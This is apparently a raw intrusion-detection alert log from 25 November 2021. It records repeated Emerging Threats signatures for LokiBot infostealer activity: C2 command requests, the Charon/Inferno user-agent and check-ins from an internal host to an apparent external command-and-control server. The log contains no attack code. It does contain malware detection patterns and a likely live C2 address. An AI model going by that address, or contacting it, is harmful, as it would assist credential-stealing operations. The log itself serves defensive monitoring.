                                              11/25/21-10:49:50.135554TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003780192.168.11.20176.223.209.128
                                              11/25/21-10:49:50.664838TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003880192.168.11.20176.223.209.128
                                              11/25/21-10:49:50.664838TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003880192.168.11.20176.223.209.128
                                              11/25/21-10:49:50.664838TCP2025381ET TROJAN LokiBot Checkin5003880192.168.11.20176.223.209.128
                                              11/25/21-10:49:50.664838TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003880192.168.11.20176.223.209.128
                                              11/25/21-10:49:51.178533TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003980192.168.11.20176.223.209.128
                                              11/25/21-10:49:51.178533TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003980192.168.11.20176.223.209.128
                                              11/25/21-10:49:51.178533TCP2025381ET TROJAN LokiBot Checkin5003980192.168.11.20176.223.209.128
                                              11/25/21-10:49:51.178533TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003980192.168.11.20176.223.209.128
                                              11/25/21-10:49:51.668767TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004080192.168.11.20176.223.209.128
                                              11/25/21-10:49:51.668767TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004080192.168.11.20176.223.209.128
                                              11/25/21-10:49:51.668767TCP2025381ET TROJAN LokiBot Checkin5004080192.168.11.20176.223.209.128
                                              11/25/21-10:49:51.668767TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004080192.168.11.20176.223.209.128
                                              11/25/21-10:49:52.098875TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004180192.168.11.20176.223.209.128
                                              11/25/21-10:49:52.098875TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004180192.168.11.20176.223.209.128
                                              11/25/21-10:49:52.098875TCP2025381ET TROJAN LokiBot Checkin5004180192.168.11.20176.223.209.128
                                              11/25/21-10:49:52.098875TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004180192.168.11.20176.223.209.128
                                              11/25/21-10:49:52.618484TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004280192.168.11.20176.223.209.128
                                              11/25/21-10:49:52.618484TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004280192.168.11.20176.223.209.128
                                              11/25/21-10:49:52.618484TCP2025381ET TROJAN LokiBot Checkin5004280192.168.11.20176.223.209.128
                                              11/25/21-10:49:52.618484TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004280192.168.11.20176.223.209.128
                                              11/25/21-10:49:53.143999TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004380192.168.11.20176.223.209.128
                                              11/25/21-10:49:53.143999TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004380192.168.11.20176.223.209.128
                                              11/25/21-10:49:53.143999TCP2025381ET TROJAN LokiBot Checkin5004380192.168.11.20176.223.209.128
                                              11/25/21-10:49:53.143999TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004380192.168.11.20176.223.209.128
                                              11/25/21-10:49:53.594525TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004480192.168.11.20176.223.209.128
                                              11/25/21-10:49:53.594525TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004480192.168.11.20176.223.209.128
                                              11/25/21-10:49:53.594525TCP2025381ET TROJAN LokiBot Checkin5004480192.168.11.20176.223.209.128
                                              11/25/21-10:49:53.594525TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004480192.168.11.20176.223.209.128
                                              11/25/21-10:49:54.082518TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004580192.168.11.20176.223.209.128
                                              11/25/21-10:49:54.082518TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004580192.168.11.20176.223.209.128
                                              11/25/21-10:49:54.082518TCP2025381ET TROJAN LokiBot Checkin5004580192.168.11.20176.223.209.128
                                              11/25/21-10:49:54.082518TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004580192.168.11.20176.223.209.128
                                              11/25/21-10:49:54.580386TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004680192.168.11.20176.223.209.128
                                              11/25/21-10:49:54.580386TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004680192.168.11.20176.223.209.128
                                              11/25/21-10:49:54.580386TCP2025381ET TROJAN LokiBot Checkin5004680192.168.11.20176.223.209.128
                                              11/25/21-10:49:54.580386TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004680192.168.11.20176.223.209.128
                                              11/25/21-10:49:55.062276TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004780192.168.11.20176.223.209.128
                                              11/25/21-10:49:55.062276TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004780192.168.11.20176.223.209.128
                                              11/25/21-10:49:55.062276TCP2025381ET TROJAN LokiBot Checkin5004780192.168.11.20176.223.209.128
                                              11/25/21-10:49:55.062276TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004780192.168.11.20176.223.209.128
                                              11/25/21-10:49:55.508760TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004880192.168.11.20176.223.209.128
                                              11/25/21-10:49:55.508760TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004880192.168.11.20176.223.209.128
                                              11/25/21-10:49:55.508760TCP2025381ET TROJAN LokiBot Checkin5004880192.168.11.20176.223.209.128
                                              11/25/21-10:49:55.508760TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004880192.168.11.20176.223.209.128
                                              11/25/21-10:49:56.010864TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004980192.168.11.20176.223.209.128
                                              11/25/21-10:49:56.010864TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004980192.168.11.20176.223.209.128
                                              11/25/21-10:49:56.010864TCP2025381ET TROJAN LokiBot Checkin5004980192.168.11.20176.223.209.128
                                              11/25/21-10:49:56.010864TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004980192.168.11.20176.223.209.128
                                              11/25/21-10:49:56.523326TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005080192.168.11.20176.223.209.128
                                              11/25/21-10:49:56.523326TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005080192.168.11.20176.223.209.128
                                              11/25/21-10:49:56.523326TCP2025381ET TROJAN LokiBot Checkin5005080192.168.11.20176.223.209.128
                                              11/25/21-10:49:56.523326TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005080192.168.11.20176.223.209.128
                                              11/25/21-10:49:57.024274TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005180192.168.11.20176.223.209.128
                                              11/25/21-10:49:57.024274TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005180192.168.11.20176.223.209.128
                                              11/25/21-10:49:57.024274TCP2025381ET TROJAN LokiBot Checkin5005180192.168.11.20176.223.209.128
                                              11/25/21-10:49:57.024274TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005180192.168.11.20176.223.209.128
                                              11/25/21-10:49:57.509550TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005280192.168.11.20176.223.209.128
                                              11/25/21-10:49:57.509550TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005280192.168.11.20176.223.209.128
                                              11/25/21-10:49:57.509550TCP2025381ET TROJAN LokiBot Checkin5005280192.168.11.20176.223.209.128
                                              11/25/21-10:49:57.509550TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005280192.168.11.20176.223.209.128
                                              11/25/21-10:49:58.004627TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005380192.168.11.20176.223.209.128
                                              11/25/21-10:49:58.004627TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005380192.168.11.20176.223.209.128
                                              11/25/21-10:49:58.004627TCP2025381ET TROJAN LokiBot Checkin5005380192.168.11.20176.223.209.128
                                              11/25/21-10:49:58.004627TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005380192.168.11.20176.223.209.128
                                              11/25/21-10:49:58.514003TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005480192.168.11.20176.223.209.128
                                              11/25/21-10:49:58.514003TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005480192.168.11.20176.223.209.128
                                              11/25/21-10:49:58.514003TCP2025381ET TROJAN LokiBot Checkin5005480192.168.11.20176.223.209.128
                                              11/25/21-10:49:58.514003TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005480192.168.11.20176.223.209.128
                                              11/25/21-10:49:59.022258TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005580192.168.11.20176.223.209.128
                                              11/25/21-10:49:59.022258TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005580192.168.11.20176.223.209.128
                                              11/25/21-10:49:59.022258TCP2025381ET TROJAN LokiBot Checkin5005580192.168.11.20176.223.209.128
                                              11/25/21-10:49:59.022258TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005580192.168.11.20176.223.209.128
                                              11/25/21-10:49:59.545415TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005680192.168.11.20176.223.209.128
                                              11/25/21-10:49:59.545415TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005680192.168.11.20176.223.209.128
                                              11/25/21-10:49:59.545415TCP2025381ET TROJAN LokiBot Checkin5005680192.168.11.20176.223.209.128
                                              11/25/21-10:49:59.545415TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005680192.168.11.20176.223.209.128
                                              11/25/21-10:50:00.060117TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005780192.168.11.20176.223.209.128
                                              11/25/21-10:50:00.060117TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005780192.168.11.20176.223.209.128
                                              11/25/21-10:50:00.060117TCP2025381ET TROJAN LokiBot Checkin5005780192.168.11.20176.223.209.128
                                              11/25/21-10:50:00.060117TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005780192.168.11.20176.223.209.128
                                              11/25/21-10:50:00.566566TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005880192.168.11.20176.223.209.128
                                              11/25/21-10:50:00.566566TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005880192.168.11.20176.223.209.128
                                              11/25/21-10:50:00.566566TCP2025381ET TROJAN LokiBot Checkin5005880192.168.11.20176.223.209.128
                                              11/25/21-10:50:00.566566TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005880192.168.11.20176.223.209.128
                                              11/25/21-10:50:01.074114TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005980192.168.11.20176.223.209.128
                                              11/25/21-10:50:01.074114TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005980192.168.11.20176.223.209.128
                                              11/25/21-10:50:01.074114TCP2025381ET TROJAN LokiBot Checkin5005980192.168.11.20176.223.209.128
                                              11/25/21-10:50:01.074114TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005980192.168.11.20176.223.209.128
                                              11/25/21-10:50:01.589853TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006080192.168.11.20176.223.209.128
                                              11/25/21-10:50:01.589853TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006080192.168.11.20176.223.209.128
                                              11/25/21-10:50:01.589853TCP2025381ET TROJAN LokiBot Checkin5006080192.168.11.20176.223.209.128
                                              11/25/21-10:50:01.589853TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006080192.168.11.20176.223.209.128
                                              11/25/21-10:50:02.090231TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006180192.168.11.20176.223.209.128
                                              11/25/21-10:50:02.090231TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006180192.168.11.20176.223.209.128
                                              11/25/21-10:50:02.090231TCP2025381ET TROJAN LokiBot Checkin5006180192.168.11.20176.223.209.128
                                              11/25/21-10:50:02.090231TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006180192.168.11.20176.223.209.128
                                              11/25/21-10:50:02.599251TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006280192.168.11.20176.223.209.128
                                              11/25/21-10:50:02.599251TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006280192.168.11.20176.223.209.128
                                              11/25/21-10:50:02.599251TCP2025381ET TROJAN LokiBot Checkin5006280192.168.11.20176.223.209.128
                                              11/25/21-10:50:02.599251TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006280192.168.11.20176.223.209.128
                                              11/25/21-10:50:03.115368TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006380192.168.11.20176.223.209.128
                                              11/25/21-10:50:03.115368TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006380192.168.11.20176.223.209.128
                                              11/25/21-10:50:03.115368TCP2025381ET TROJAN LokiBot Checkin5006380192.168.11.20176.223.209.128
                                              11/25/21-10:50:03.115368TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006380192.168.11.20176.223.209.128
                                              11/25/21-10:50:03.594284TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006480192.168.11.20176.223.209.128
                                              11/25/21-10:50:03.594284TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006480192.168.11.20176.223.209.128
                                              11/25/21-10:50:03.594284TCP2025381ET TROJAN LokiBot Checkin5006480192.168.11.20176.223.209.128
                                              11/25/21-10:50:03.594284TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006480192.168.11.20176.223.209.128
                                              11/25/21-10:50:04.083753TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006580192.168.11.20176.223.209.128
                                              11/25/21-10:50:04.083753TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006580192.168.11.20176.223.209.128
                                              11/25/21-10:50:04.083753TCP2025381ET TROJAN LokiBot Checkin5006580192.168.11.20176.223.209.128
                                              11/25/21-10:50:04.083753TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006580192.168.11.20176.223.209.128
                                              11/25/21-10:50:04.617832TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006680192.168.11.20176.223.209.128
                                              11/25/21-10:50:04.617832TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006680192.168.11.20176.223.209.128
                                              11/25/21-10:50:04.617832TCP2025381ET TROJAN LokiBot Checkin5006680192.168.11.20176.223.209.128
                                              11/25/21-10:50:04.617832TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006680192.168.11.20176.223.209.128
                                              11/25/21-10:50:05.185905TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006780192.168.11.20176.223.209.128
                                              11/25/21-10:50:05.185905TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006780192.168.11.20176.223.209.128
                                              11/25/21-10:50:05.185905TCP2025381ET TROJAN LokiBot Checkin5006780192.168.11.20176.223.209.128
                                              11/25/21-10:50:05.185905TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006780192.168.11.20176.223.209.128
                                              11/25/21-10:50:05.692300TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006880192.168.11.20176.223.209.128
                                              11/25/21-10:50:05.692300TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006880192.168.11.20176.223.209.128
                                              11/25/21-10:50:05.692300TCP2025381ET TROJAN LokiBot Checkin5006880192.168.11.20176.223.209.128
                                              11/25/21-10:50:05.692300TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006880192.168.11.20176.223.209.128
                                              11/25/21-10:50:06.194184TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006980192.168.11.20176.223.209.128
                                              11/25/21-10:50:06.194184TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006980192.168.11.20176.223.209.128
                                              11/25/21-10:50:06.194184TCP2025381ET TROJAN LokiBot Checkin5006980192.168.11.20176.223.209.128
                                              11/25/21-10:50:06.194184TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006980192.168.11.20176.223.209.128
                                              11/25/21-10:50:06.671276TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007080192.168.11.20176.223.209.128
                                              11/25/21-10:50:06.671276TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007080192.168.11.20176.223.209.128
                                              11/25/21-10:50:06.671276TCP2025381ET TROJAN LokiBot Checkin5007080192.168.11.20176.223.209.128
                                              11/25/21-10:50:06.671276TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007080192.168.11.20176.223.209.128
                                              11/25/21-10:50:07.189424TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007180192.168.11.20176.223.209.128
                                              11/25/21-10:50:07.189424TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007180192.168.11.20176.223.209.128
                                              11/25/21-10:50:07.189424TCP2025381ET TROJAN LokiBot Checkin5007180192.168.11.20176.223.209.128
                                              11/25/21-10:50:07.189424TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007180192.168.11.20176.223.209.128
                                              11/25/21-10:50:07.699299TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007280192.168.11.20176.223.209.128
                                              11/25/21-10:50:07.699299TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007280192.168.11.20176.223.209.128
                                              11/25/21-10:50:07.699299TCP2025381ET TROJAN LokiBot Checkin5007280192.168.11.20176.223.209.128
                                              11/25/21-10:50:07.699299TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007280192.168.11.20176.223.209.128
                                              11/25/21-10:50:08.202000TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007380192.168.11.20176.223.209.128
                                              11/25/21-10:50:08.202000TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007380192.168.11.20176.223.209.128
                                              11/25/21-10:50:08.202000TCP2025381ET TROJAN LokiBot Checkin5007380192.168.11.20176.223.209.128
                                              11/25/21-10:50:08.202000TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007380192.168.11.20176.223.209.128
                                              11/25/21-10:50:08.706879TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007480192.168.11.20176.223.209.128
                                              11/25/21-10:50:08.706879TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007480192.168.11.20176.223.209.128
                                              11/25/21-10:50:08.706879TCP2025381ET TROJAN LokiBot Checkin5007480192.168.11.20176.223.209.128
                                              11/25/21-10:50:08.706879TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007480192.168.11.20176.223.209.128
                                              11/25/21-10:50:09.222780TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007580192.168.11.20176.223.209.128
                                              11/25/21-10:50:09.222780TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007580192.168.11.20176.223.209.128
                                              11/25/21-10:50:09.222780TCP2025381ET TROJAN LokiBot Checkin5007580192.168.11.20176.223.209.128
                                              11/25/21-10:50:09.222780TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007580192.168.11.20176.223.209.128
                                              11/25/21-10:50:09.674116TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007680192.168.11.20176.223.209.128
                                              11/25/21-10:50:09.674116TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007680192.168.11.20176.223.209.128
                                              11/25/21-10:50:09.674116TCP2025381ET TROJAN LokiBot Checkin5007680192.168.11.20176.223.209.128
                                              11/25/21-10:50:09.674116TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007680192.168.11.20176.223.209.128
                                              11/25/21-10:50:10.188351TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007780192.168.11.20176.223.209.128
                                              11/25/21-10:50:10.188351TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007780192.168.11.20176.223.209.128
                                              11/25/21-10:50:10.188351TCP2025381ET TROJAN LokiBot Checkin5007780192.168.11.20176.223.209.128
                                              11/25/21-10:50:10.188351TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007780192.168.11.20176.223.209.128
                                              11/25/21-10:50:10.703556TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007880192.168.11.20176.223.209.128
                                              11/25/21-10:50:10.703556TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007880192.168.11.20176.223.209.128
                                              11/25/21-10:50:10.703556TCP2025381ET TROJAN LokiBot Checkin5007880192.168.11.20176.223.209.128
                                              11/25/21-10:50:10.703556TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007880192.168.11.20176.223.209.128
                                              11/25/21-10:50:11.205022TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007980192.168.11.20176.223.209.128
                                              11/25/21-10:50:11.205022TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007980192.168.11.20176.223.209.128
                                              11/25/21-10:50:11.205022TCP2025381ET TROJAN LokiBot Checkin5007980192.168.11.20176.223.209.128
                                              11/25/21-10:50:11.205022TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007980192.168.11.20176.223.209.128
                                              11/25/21-10:50:11.714368TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008080192.168.11.20176.223.209.128
                                              11/25/21-10:50:11.714368TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008080192.168.11.20176.223.209.128
                                              11/25/21-10:50:11.714368TCP2025381ET TROJAN LokiBot Checkin5008080192.168.11.20176.223.209.128
                                              11/25/21-10:50:11.714368TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008080192.168.11.20176.223.209.128
                                              11/25/21-10:50:12.226092TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008180192.168.11.20176.223.209.128
                                              11/25/21-10:50:12.226092TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008180192.168.11.20176.223.209.128
                                              11/25/21-10:50:12.226092TCP2025381ET TROJAN LokiBot Checkin5008180192.168.11.20176.223.209.128
                                              11/25/21-10:50:12.226092TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008180192.168.11.20176.223.209.128
                                              11/25/21-10:50:12.706710TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008280192.168.11.20176.223.209.128
                                              11/25/21-10:50:12.706710TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008280192.168.11.20176.223.209.128
                                              11/25/21-10:50:12.706710TCP2025381ET TROJAN LokiBot Checkin5008280192.168.11.20176.223.209.128
                                              11/25/21-10:50:12.706710TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008280192.168.11.20176.223.209.128
                                              11/25/21-10:50:13.215745TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008380192.168.11.20176.223.209.128
                                              11/25/21-10:50:13.215745TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008380192.168.11.20176.223.209.128
                                              11/25/21-10:50:13.215745TCP2025381ET TROJAN LokiBot Checkin5008380192.168.11.20176.223.209.128
                                              11/25/21-10:50:13.215745TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008380192.168.11.20176.223.209.128
                                              11/25/21-10:50:13.714873TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008480192.168.11.20176.223.209.128
                                              11/25/21-10:50:13.714873TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008480192.168.11.20176.223.209.128
                                              11/25/21-10:50:13.714873TCP2025381ET TROJAN LokiBot Checkin5008480192.168.11.20176.223.209.128
                                              11/25/21-10:50:13.714873TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008480192.168.11.20176.223.209.128
                                              11/25/21-10:50:14.199511TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008580192.168.11.20176.223.209.128
                                              11/25/21-10:50:14.199511TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008580192.168.11.20176.223.209.128
                                              11/25/21-10:50:14.199511TCP2025381ET TROJAN LokiBot Checkin5008580192.168.11.20176.223.209.128
                                              11/25/21-10:50:14.199511TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008580192.168.11.20176.223.209.128
                                              11/25/21-10:50:14.643842TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008680192.168.11.20176.223.209.128
                                              11/25/21-10:50:14.643842TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008680192.168.11.20176.223.209.128
                                              11/25/21-10:50:14.643842TCP2025381ET TROJAN LokiBot Checkin5008680192.168.11.20176.223.209.128
                                              11/25/21-10:50:14.643842TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008680192.168.11.20176.223.209.128
                                              11/25/21-10:50:15.146124TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008780192.168.11.20176.223.209.128
                                              11/25/21-10:50:15.146124TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008780192.168.11.20176.223.209.128
                                              11/25/21-10:50:15.146124TCP2025381ET TROJAN LokiBot Checkin5008780192.168.11.20176.223.209.128
                                              11/25/21-10:50:15.146124TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008780192.168.11.20176.223.209.128
                                              11/25/21-10:50:15.653331TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008880192.168.11.20176.223.209.128
                                              11/25/21-10:50:15.653331TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008880192.168.11.20176.223.209.128
                                              11/25/21-10:50:15.653331TCP2025381ET TROJAN LokiBot Checkin5008880192.168.11.20176.223.209.128
                                              11/25/21-10:50:15.653331TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008880192.168.11.20176.223.209.128
                                              11/25/21-10:50:16.166462TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008980192.168.11.20176.223.209.128
                                              11/25/21-10:50:16.166462TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008980192.168.11.20176.223.209.128
                                              11/25/21-10:50:16.166462TCP2025381ET TROJAN LokiBot Checkin5008980192.168.11.20176.223.209.128
                                              11/25/21-10:50:16.166462TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008980192.168.11.20176.223.209.128
                                              11/25/21-10:50:16.686571TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009080192.168.11.20176.223.209.128
                                              11/25/21-10:50:16.686571TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009080192.168.11.20176.223.209.128
                                              11/25/21-10:50:16.686571TCP2025381ET TROJAN LokiBot Checkin5009080192.168.11.20176.223.209.128
                                              11/25/21-10:50:16.686571TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009080192.168.11.20176.223.209.128
                                              11/25/21-10:50:17.195199TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009180192.168.11.20176.223.209.128
                                              11/25/21-10:50:17.195199TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009180192.168.11.20176.223.209.128
                                              11/25/21-10:50:17.195199TCP2025381ET TROJAN LokiBot Checkin5009180192.168.11.20176.223.209.128
                                              11/25/21-10:50:17.195199TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009180192.168.11.20176.223.209.128
                                              11/25/21-10:50:17.638429TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009280192.168.11.20176.223.209.128
                                              11/25/21-10:50:17.638429TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009280192.168.11.20176.223.209.128
                                              11/25/21-10:50:17.638429TCP2025381ET TROJAN LokiBot Checkin5009280192.168.11.20176.223.209.128
                                              11/25/21-10:50:17.638429TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009280192.168.11.20176.223.209.128
                                              11/25/21-10:50:18.158986TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009380192.168.11.20176.223.209.128
                                              11/25/21-10:50:18.158986TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009380192.168.11.20176.223.209.128
                                              11/25/21-10:50:18.158986TCP2025381ET TROJAN LokiBot Checkin5009380192.168.11.20176.223.209.128
                                              11/25/21-10:50:18.158986TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009380192.168.11.20176.223.209.128
                                              11/25/21-10:50:18.673645TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009480192.168.11.20176.223.209.128
                                              11/25/21-10:50:18.673645TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009480192.168.11.20176.223.209.128
                                              11/25/21-10:50:18.673645TCP2025381ET TROJAN LokiBot Checkin5009480192.168.11.20176.223.209.128
                                              11/25/21-10:50:18.673645TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009480192.168.11.20176.223.209.128
                                              11/25/21-10:50:19.184222TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009580192.168.11.20176.223.209.128
                                              11/25/21-10:50:19.184222TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009580192.168.11.20176.223.209.128
                                              11/25/21-10:50:19.184222TCP2025381ET TROJAN LokiBot Checkin5009580192.168.11.20176.223.209.128
                                              11/25/21-10:50:19.184222TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009580192.168.11.20176.223.209.128
